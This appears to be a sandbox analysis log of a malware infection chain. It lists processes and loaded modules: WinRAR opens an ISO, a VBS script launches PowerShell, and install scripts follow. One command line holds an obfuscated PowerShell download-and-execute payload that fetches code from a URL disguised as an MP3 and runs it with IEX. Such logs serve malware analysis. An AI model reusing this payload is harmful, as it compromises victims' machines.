c:\windows\system32\oleaut32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\slc.dll
c:\windows\system32\shell32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msctf.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\actxprxy.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\devobj.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\dui70.dll
c:\windows\system32\imm32.dll

PID
3428
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Documents\QPRCK498428.iso"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.91.0
Modules
Image
c:\windows\system32\msctf.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\propsys.dll
c:\windows\system32\cscui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sspicli.dll
c:\program files\winrar\winrar.exe
c:\windows\system32\shell32.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imageres.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\riched20.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\winmm.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\sechost.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\audiodev.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\slc.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\secur32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\netutils.dll
c:\windows\system32\samlib.dll
c:\windows\system32\dui70.dll
c:\windows\system32\duser.dll
c:\windows\system32\profapi.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\explorerframe.dll

PID
1612
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Documents\QPRCK498428.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft � Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
c:\windows\system32\user32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\lpk.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msisip.dll
c:\windows\system32\sechost.dll
c:\windows\system32\version.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\crypt32.dll
c:\windows\system32\wscript.exe
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\wshext.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\rsaenh.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\sxs.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wldap32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\wininet.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\propsys.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\webio.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\profapi.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\userenv.dll
c:\windows\system32\urlmon.dll

PID
3144
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [<#645848699465732105195380287398536904030378238146025604764639984530492547010939664251867247291236916#>System.Threading.Thread<#332582934080410965342560428418888379619956774943186044163478065547816208676717123690088264390539329#>]::Sleep(885557335194378991089635452410767445166130872137768064703175998831933835909392882813125872937454823);[<#881226574524467035756739689555252751625644928374972474814545552314681526844644513224919051730462161#>System.Threading.Thread<#544462906549900783721356981687314308695583891908023026103953193714290957895846672145227083480734405#>]::Sleep(361720056294770100834534979450663059629730671111794807664607425254769988602043428691349785043126617); $CMcmCLk='(New-';<#104287626038522532610194239851465902448853701335375449476793672258465401850339040992324545446048459#>$cRFZNFU<#908573536026652706339700453607594375571856550901775514836009707493001619461840490399262830314387938#> = 'FcToZba '.Replace('FcToZba','Object');<#330353833174427751061035914351580963843522738065878517819591677731953794999980608218653696559937714#>$tunbltM<#510534477852060853107530118032801301936831658882015175756738686695181667993386351153760457677069284#> = '8623093'.Replace('8623093','Net');$OjDWcdg<#250153126874169582138590232886165222377226929185100191881138388816950390888455167652398373025963315#> = 'duJIsbq'.Replace('duJIsbq','.We');$aKnyylX<#811227991280465912278007551837915671316795971627264870415149471449000404660551561917010286586543568#>='foYRetD '.Replace('foYRetD ','.Downlo');$eidNRbT<#013641744223997255744180918329689968004206360691223920434528726286866310075938732447216203341918429#> = 'OkwZafA'.Replace('OkwZafA','bClient)');[<#308193005475249696351229526676061814607011810057109098409289623130464751615114043683514601550262909#>System.Threading.Thread<#902792029052939860872955749761206506718699305169510257485179048122204793237260241766664687353202368#>]::Sleep(<#998380067313436303362194097464034126273445792407246032775071979484995426295600923067080962795188093#>2000<#306438298499538272654651829335211203279325447707873228998889919131044184735514588168317138005210002#>);<#397309945173855672384369450171872647247418566780208998484776911630098243134646914394900937122996535#>$lwdbCqP<#861122098562862161152450664323292818299173198171719595638757127350487586127512033064810696604331706#>='nbGEVOQ(''https://v3-fastupload.s3-accelerate.amazonaws.com/1641997458-image.mp3'')'.Replace('nbGEVOQ','adString');<#574641522893469503706150684357854152566314917851986966587273130993946711844822565143772025386674753#>$YZMVZRJ<#580913649042024269864618027802447779658184071440001353417374826065197308245895936293353167738067665#> = <#859303231381657595356127086158365125020366821533646321576606884558276145794642540289686675240587716#>$CMcmCLk,<#224473931473431264133899671659170574129100815631780651892791932502059371018612669863981183229099767#>$cRFZNFU,<#537525641023134406932515911730359194848624175568644706481489934387684505898295125351057833901680598#>$tunbltM,<#994931512654288049079387341385298552491778095342074754662856020905244601549295859288594780472599450#>$OjDWcdg,<#272139064285787471548684516721248839661331983800095166438646025883564114051998577993775691815917716#>$eidNRbT,<#933692313555877725402566668010444187488805377765075380124189245835240499212532827989826782709504664#>$aKnyylX,<#928263178579062698705129928185257046260284778043135775361415045562403230912338619853652391385729508#>$lwdbCqP;<#469573790628029047216945044120987780668442213140254403394682963674813132882216296335298562362700434#>$dnKjCGT<#062725273768547580172901546947299382239023848932508432353358088962523733211666541126164853690307471#> = 'XPJYQCF '.Replace('XPJYQCF ','I`E`X');<#717159288687601820585903060231480539672712265216424710315509299302723408648706012051460270579008883#>$OcQmYlt<#645848699465732105195380287398536904030378238146025604764639984530492547010939664251867247291236916#> = <#286549425252617420261699127529272653659319148715343009731638488938630443882891320112000597665012822#>$dnKjCGT+(<#578221803553221160850493742702662470202483065196220890108137147630188139709755250722276067674687473#>$YZMVZRJ -Join '')|I`E`X;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ntdll.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\lpk.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\usp10.dll
c:\windows\system32\atl.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\msctf.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msisip.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\nsi.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\shell32.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\psapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\ws2_32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\imm32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\user32.dll
c:\windows\system32\cryptsp.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\version.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\secur32.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\userenv.dll
c:\windows\system32\rasman.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wship6.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\webio.dll
c:\windows\system32\rasadhlp.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pae3498d9#\e8948a2d96b83812948847619fc784bc\microsoft.powershell.commands.management.ni.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\propsys.dll
c:\windows\system32\wininet.dll
c:\windows\system32\wscript.exe
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\devobj.dll

PID
2960
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\Public\install.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft � Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\lpk.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\profapi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\shell32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\mpr.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\ole32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\user32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\wscript.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\propsys.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\sechost.dll
c:\windows\system32\usp10.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\msisip.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\sxs.dll
c:\windows\system32\cryptsp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll

PID
2212
CMD
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\install.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\sechost.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\imm32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\rpcrt4.dll

PID
3812
CMD
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\install.ps1'"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\bcrypt.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\assembly\gac_msil\microsoft.backgroundintelligenttransfer.management\1.0.0.0__31bf3856ad364e35\microsoft.backgroundintelligenttransfer.management.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\windowspowershell\v1.0\modules\microsoft.powershell.localaccounts\1.0.0.0\microsoft.powershell.localaccounts.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pae3498d9#\e8948a2d96b83812948847619fc784bc\microsoft.powershell.commands.management.ni.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\userenv.dll
c:\windows\system32\ncrypt.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\shlwapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\user32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cryptsp.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.xmlhelper\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.xmlhelper.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\secur32.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.policymodel\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policymodel.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\shell32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\profapi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.policymanager\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policymanager.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\gac_32\microsoft.security.applicationid.policymanagement.policyengineapi.interop\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policyengineapi.interop.dll
c:\windows\system32\nsi.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\version.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.cmdlets\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.cmdlets.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.m870d558a#\ef9d2180a14c81c0b92daf314e56342a\microsoft.management.infrastructure.native.ni.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\system32\wshext.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\gac_msil\microsoft.windows.diagnosis.troubleshootingpack\6.1.0.0__31bf3856ad364e35\microsoft.windows.diagnosis.troubleshootingpack.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\assembly\gac_32\microsoft.windows.diagnosis.sdengine\6.1.0.0__31bf3856ad364e35\microsoft.windows.diagnosis.sdengine.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll

PID
1488
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe"
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\sechost.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\version.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\winmm.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\advapi32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\msctf.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\user32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
